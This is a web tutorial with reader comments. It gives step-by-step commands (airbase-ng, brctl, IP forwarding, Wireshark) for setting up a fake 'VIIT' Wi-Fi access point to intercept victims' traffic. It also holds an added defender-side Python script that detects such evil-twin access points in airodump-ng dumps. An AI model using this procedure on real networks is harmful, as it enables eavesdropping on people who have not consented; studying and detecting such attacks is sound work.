In this tutorial we will perform a MITM attack.
To perform a Man-in-the-Middle (MITM) attack, we will create a fake access point on our laptop and monitor the traffic of victim users connected to it. We forward the traffic of victim users on to the servers, so they will still be able to access resources on the network; all of their access passes through our laptop, hence we will be able to see all their communications.
Steps to perform the MITM attack:
1. First check for wireless devices on your computer.
$ airmon-ng
2. Now create a wireless monitoring interface:
$ airmon-ng start wlan0
3. Monitor what's on the wireless network, such as access points in the neighborhood, wireless devices, channels used, etc.
$ airodump-ng mon0
4. Create and launch our own access point (fake access point)
$ airbase-ng --essid VIIT -c 11 mon0
The SSID of our access point will be "VIIT" and it is running on channel 11.
5. Verify details of the logical access point interface
$ ifconfig at0
6. Create a bridge interface
$ brctl addbr myBridge
7. Now, associate the real interfaces (eth0 and at0) with the bridge interface
$ brctl addif myBridge eth0
$ brctl addif myBridge at0
8. Verify details of the new bridge interface
$ brctl show
9. Remove the IP address of eth0 and at0 interfaces
$ ifconfig eth0 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
10. Assign an IP address to the bridge interface we created earlier. You can use your old eth0 IP address or assign any free IP address on your network
$ ifconfig myBridge 10.10.10.1/8 up
11. Enable IP forwarding on your computer. In other words, your computer will work as a router; it will perform NAT.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
12. Now use the Wireshark tool to monitor the traffic of users associated with your fake wireless access point.
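A defender-side complement to step 3, added here as an example that is not part of the original tutorial: airodump-ng can also write what it sees to CSV (`-w <prefix>` produces `<prefix>-01.csv`), and the script below parses a dump in that layout to flag an ESSID advertised by two BSSIDs (the fake "VIIT" next to the real one) together with the clients attached to each. The column names follow airodump-ng's CSV header as I know it, the parser looks columns up by name rather than position, and the sample rows and MAC addresses are constructed.

```python
import csv
import io
from collections import defaultdict

# Constructed sample (made-up MACs) in the layout airodump-ng writes to <prefix>-01.csv
# with "-w <prefix>": an access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,  4, VIIT, 
66:77:88:99:AA:BB, 2024-01-01 10:02:00, 2024-01-01 10:05:00, 11,  54, OPN ,     ,    , -30,  90, 0,   0.  0.  0.  0,  4, VIIT, 
CC:DD:EE:FF:00:11, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -70,  80, 0,   0.  0.  0.  0,  5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:AA:AA:AA, 2024-01-01 10:03:00, 2024-01-01 10:05:00, -50, 12, 66:77:88:99:AA:BB, VIIT
"""

def _read_table(section):
    """Parse one airodump-ng CSV table into dicts keyed by the stripped header names."""
    reader = csv.DictReader(io.StringIO(section.strip("\n")), skipinitialspace=True)
    return [{k.strip(): (v or "").strip() for k, v in row.items() if k is not None}
            for row in reader]

def parse_airodump_csv(text):
    """Split the dump at its blank line into the AP table and the station table."""
    parts = text.split("\n\n", 1)
    aps = _read_table(parts[0])
    stations = _read_table(parts[1]) if len(parts) > 1 else []
    return aps, stations

def find_evil_twins(aps, stations):
    """Flag each ESSID seen from more than one BSSID (a fake AP copying a real network
    name), with the clients on each BSSID and whether one twin is open (OPN)."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap.get("ESSID"):
            by_essid[ap["ESSID"]].append(ap)
    clients = defaultdict(list)
    for st in stations:
        clients[st["BSSID"]].append(st["Station MAC"])
    findings = []
    for essid, entries in by_essid.items():
        if len(entries) < 2:
            continue
        privacy = {e["Privacy"] for e in entries}
        findings.append({"essid": essid,
                         "bssids": sorted(e["BSSID"] for e in entries),
                         "channels": sorted(int(e["channel"]) for e in entries),
                         "open_twin": "OPN" in privacy and len(privacy) > 1,
                         "clients": {e["BSSID"]: clients[e["BSSID"]] for e in entries}})
    return findings
```

On a real dump, a twin that appears with a different BSSID, on another channel and with no encryption while the known network uses WPA2 is exactly the footprint this tutorial's airbase-ng setup leaves.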
Friend.. the brctl tool is no longer available in Kali. Then how is it?
bash: brctl: command not found?
sudo apt-get install bridge-utils
How do I restore normal functionality?
I can delete the bridge with "brctl delbr myBridge" after I stopped it with "ifconfig myBridge down".
How do I undo the changes done by "ifconfig eth0 0.0.0.0 up" ?
I'm sure you have figured it out but for anyone else's reference: either bring myBridge up by the command: ifconfig myBridge up, then delete the bridge myBridge with the command: brctl delbr myBridge and confirm the deletion with brctl show. Now you shouldn't have to undo any changes to eth0 after; the DHCP server on your network should automatically issue you a new IP when you reconnect, bring eth0 down then back up, or you can manually renew your IP lease.